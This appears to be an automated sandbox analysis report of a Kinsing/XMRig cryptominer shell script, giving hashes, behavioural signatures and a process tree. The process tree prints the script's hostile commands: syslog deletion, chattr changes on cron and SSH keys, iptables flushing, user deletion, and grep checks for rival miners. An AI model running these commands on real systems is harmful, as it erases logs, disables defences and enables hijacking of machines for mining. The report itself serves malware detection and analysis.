Analysis
-
max time kernel
117s -
max time network
114s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20231221-en -
resource tags
arch:mipselimage:debian9-mipsel-20231221-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
07-02-2024 01:13
Static task
static1
Behavioral task
behavioral1
Sample
8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006.sh
Resource
ubuntu1804-amd64-20231222-en
Behavioral task
behavioral2
Sample
8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006.sh
Resource
debian9-armhf-20231215-en
Behavioral task
behavioral3
Sample
8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006.sh
Resource
debian9-mipsbe-20231222-en
Behavioral task
behavioral4
Sample
8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006.sh
Resource
debian9-mipsel-20231221-en
General
-
Target
8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006.sh
-
Size
35KB
-
MD5
2550990d2d52581b213e7c9305c392d3
-
SHA1
f7f069915c9b97550dc1fb6cf631f6222416dcf5
-
SHA256
8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006
-
SHA512
a30d4a39203e6a98937e8670b7b3caaa63d2141fdf404bb28ca240d95cb7420bdfb8c695db81cc9c799e8818266600c137b8b0df2dfc69d7566bae64eee2ad50
-
SSDEEP
768:X87XzQ5VFNcDAFLcIwgnoYq0xFB6ytguz:X3VF+D6cIwgos/z
Malware Config
Signatures
-
Kinsing payload 1 IoCs
resource yara_rule behavioral4/files/fstream-29.dat family_elf_kinsing_loader -
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
description ioc Process File deleted /var/log/syslog rm -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/kinsing 3052 Process not Found -
Flushes firewall rules 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 744 iptables -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1828 xargs 2582 Process not Found 2914 Process not Found 1723 xargs 1884 xargs 1914 xargs 2598 Process not Found 2558 Process not Found 2612 Process not Found 2930 Process not Found 1517 xargs 2131 Process not Found 2480 Process not Found 2518 Process not Found 1495 grep 1720 xargs 2004 xargs 2405 Process not Found 1735 xargs 1964 xargs 2287 Process not Found 2564 Process not Found 3031 Process not Found 1939 xargs 2126 xargs 2485 Process not Found 2648 Process not Found 2262 Process not Found 2954 Process not Found 731 chattr 1706 sed 2209 Process not Found 2242 Process not Found 1969 xargs 2166 Process not Found 1669 xargs 1681 xargs 1838 xargs 1904 xargs 1879 xargs 2415 Process not Found 3011 Process not Found 1729 xargs 1994 xargs 2317 Process not Found 2566 Process not Found 1502 xargs 1557 xargs 2445 Process not Found 1889 xargs 1949 xargs 2151 Process not Found 2181 Process not Found 739 chattr 1633 xargs 1712 sed 1730 sed 2594 Process not Found 2602 Process not Found 764 chattr 2029 xargs 1705 xargs 2592 Process not Found 2630 Process not Found -
Creates/modifies Cron job 1 TTPs 37 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.KmqXkc crontab File opened for modification /var/spool/cron/crontabs/tmp.TxWFjn crontab File opened for modification /var/spool/cron/crontabs/tmp.G5KeiR crontab File opened for modification /var/spool/cron/crontabs/tmp.AeIuYU Process not Found File opened for modification /var/spool/cron/crontabs/tmp.1IAzZf Process not Found File opened for modification /var/spool/cron/crontabs/tmp.kwYKMo Process not Found File opened for modification /var/spool/cron/crontabs/tmp.ICSfxf Process not Found File opened for modification /var/spool/cron/crontabs/tmp.AvUZIV Process not Found File opened for modification /var/spool/cron/crontabs/tmp.oI84Da crontab File opened for modification /var/spool/cron/crontabs/tmp.QA1GyA Process not Found File opened for modification /var/spool/cron/crontabs/tmp.CzHWV2 Process not Found File opened for modification /var/spool/cron/crontabs/tmp.p3DF8e Process not Found File opened for modification /var/spool/cron/crontabs/tmp.e0HLNM Process not Found File opened for modification /var/spool/cron/crontabs/tmp.GiXYUT Process not Found File opened for modification /var/spool/cron/crontabs/tmp.XtTpu2 Process not Found File opened for modification /var/spool/cron/crontabs/tmp.XMFLrs Process not Found File opened for modification /var/spool/cron/crontabs/tmp.NBnx5I crontab File opened for modification /var/spool/cron/crontabs/tmp.T7r4i4 crontab File opened for modification /var/spool/cron/crontabs/tmp.aCx3wB crontab File opened for modification /var/spool/cron/crontabs/tmp.32EzpA Process not Found File opened for modification /var/spool/cron/crontabs/tmp.tZyyUT crontab File opened for modification /var/spool/cron/crontabs/tmp.gRC5n9 crontab File opened for modification /var/spool/cron/crontabs/tmp.RYNAKn Process not Found File opened for modification /var/spool/cron/crontabs/tmp.pwFRFN Process not Found File opened for modification /var/spool/cron/crontabs/tmp.E1pwlw crontab File opened for modification /var/spool/cron/crontabs/tmp.09c4Mc crontab File opened for modification /var/spool/cron/crontabs/tmp.neLxMp crontab File opened for modification /var/spool/cron/crontabs/tmp.4l04ep Process not Found File opened for modification /var/spool/cron/crontabs/tmp.v4zXxD Process not Found File opened for modification /var/spool/cron/crontabs/tmp.HWZ2dZ Process not Found File opened for modification /var/spool/cron/crontabs/tmp.0jCI7a Process not Found File opened for modification /var/spool/cron/crontabs/tmp.KCbYxb Process not Found File opened for modification /var/spool/cron/crontabs/tmp.YgQokw Process not Found File opened for modification /var/spool/cron/crontabs/tmp.DGty3H Process not Found File opened for modification /var/spool/cron/crontabs/tmp.oHG0uf Process not Found File opened for modification /var/spool/cron/crontabs/tmp.BVMdc8 Process not Found File opened for modification /var/spool/cron/crontabs/tmp.CnV0mg Process not Found -
Disables AppArmor 28 IoCs
Disables AppArmor security module.
pid Process 2980 Process not Found 3015 Process not Found 3017 Process not Found 3007 Process not Found 3016 Process not Found 2980 Process not Found 2980 Process not Found 2999 Process not Found 3013 Process not Found 2980 Process not Found 2980 Process not Found 3011 Process not Found 3000 Process not Found 3010 Process not Found 2980 Process not Found 3003 Process not Found 3008 Process not Found 3018 Process not Found 3000 Process not Found 3000 Process not Found 3009 Process not Found 3000 Process not Found 3000 Process not Found 3019 Process not Found 3005 Process not Found 3012 Process not Found 3014 Process not Found 3000 Process not Found -
Disables SELinux 1 IoCs
Disables SELinux security module.
pid Process 2979 Process not Found -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found -
Enumerates kernel/hardware configuration 1 TTPs 33 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found File opened for reading /sys/fs/kdbus/0-system/bus Process not Found -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/1/cmdline Process not Found File opened for reading /proc/160/cmdline Process not Found File opened for reading /proc/36/stat Process not Found File opened for reading /proc/390/status ps File opened for reading /proc/36/status pkill File opened for reading /proc/24/status Process not Found File opened for reading /proc/77/cmdline ps File opened for reading /proc/727/status Process not Found File opened for reading /proc/346/cmdline Process not Found File opened for reading /proc/691/cmdline ps File opened for reading /proc/71/cmdline Process not Found File opened for reading /proc/10/cmdline Process not Found File opened for reading /proc/174/cmdline Process not Found File opened for reading /proc/376/status Process not Found File opened for reading /proc/13/cmdline Process not Found File opened for reading /proc/79/cmdline Process not Found File opened for reading /proc/5/cmdline Process not Found File opened for reading /proc/5/status ps File opened for reading /proc/19/stat ps File opened for reading /proc/69/status Process not Found File opened for reading /proc/3/status Process not Found File opened for reading /proc/16/status Process not Found File opened for reading /proc/79/cmdline Process not Found File opened for reading /proc/12/cmdline Process not Found File opened for reading /proc/24/cmdline Process not Found File opened for reading /proc/19/status Process not Found File opened for reading /proc/37/cmdline Process not Found File opened for reading /proc/uptime Process not Found File opened for reading /proc/70/cmdline Process not Found File opened for reading /proc/151/cmdline Process not Found File opened for reading /proc/19/status Process not Found File opened for reading /proc/36/status pkill File opened for reading /proc/82/status Process not Found File opened for reading /proc/76/status Process not Found File opened for reading /proc/1778/status ps File opened for reading /proc/14/stat ps File opened for reading /proc/12/status Process not Found File opened for reading /proc/12/status Process not Found File opened for reading /proc/714/status Process not Found File opened for reading /proc/22/cmdline Process not Found File opened for reading /proc/388/cmdline Process not Found File opened for reading /proc/685/cmdline Process not Found File opened for reading /proc/2714/cmdline Process not Found File opened for reading /proc/727/cmdline Process not Found File opened for reading /proc/sys/kernel/osrelease pkill File opened for reading /proc/174/cmdline ps File opened for reading /proc/390/cmdline Process not Found File opened for reading /proc/10/cmdline Process not Found File opened for reading /proc/388/cmdline Process not Found File opened for reading /proc/71/cmdline Process not Found File opened for reading /proc/714/status Process not Found File opened for reading /proc/388/cmdline Process not Found File opened for reading /proc/76/status Process not Found File opened for reading /proc/13/status Process not Found File opened for reading /proc/714/status pkill File opened for reading /proc/13/status ps File opened for reading /proc/77/cmdline Process not Found File opened for reading /proc/11/cmdline Process not Found File opened for reading /proc/160/stat ps File opened for reading /proc/8/stat Process not Found File opened for reading /proc/68/status Process not Found File opened for reading /proc/36/status pkill File opened for reading /proc/19/cmdline ps File opened for reading /proc/13/cmdline Process not Found -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/log_rot 8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006.sh
Processes
-
/tmp/8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006.sh/tmp/8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006.sh1⤵
- Writes file to tmp directory
PID:727 -
/bin/rmrm -rf /var/log/syslog2⤵
- Deletes system logs
PID:729
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
PID:731
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵PID:734
-
-
/usr/bin/chattrchattr -R -i /var/spool/cron2⤵PID:736
-
-
/usr/bin/chattrchattr -i /etc/crontab2⤵
- Attempts to change immutable files
PID:739
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:744
-
-
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵PID:748
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"3⤵PID:759
-
-
-
/usr/sbin/userdeluserdel akay2⤵PID:761
-
-
/usr/sbin/userdeluserdel vfinder2⤵PID:762
-
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵
- Attempts to change immutable files
PID:764
-
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵PID:765
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵PID:766
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵PID:769
-
-
/bin/rmrm -rf /tmp/keys2⤵PID:770
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:776
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:781
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:788
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:793
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:798
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:803
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:808
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:813
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:818
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:823
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:828
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:833
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:838
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:843
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:848
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:853
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:858
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:863
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:868
-
-
